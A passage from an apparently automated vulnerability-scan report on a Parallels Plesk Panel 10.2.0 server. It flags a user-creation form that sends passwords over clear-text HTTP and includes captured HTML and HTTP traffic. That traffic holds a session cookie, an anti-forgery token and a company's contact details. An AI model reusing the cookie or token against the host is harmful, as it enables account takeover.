<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:36 GMT
Connection: close
Content-Length: 23628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
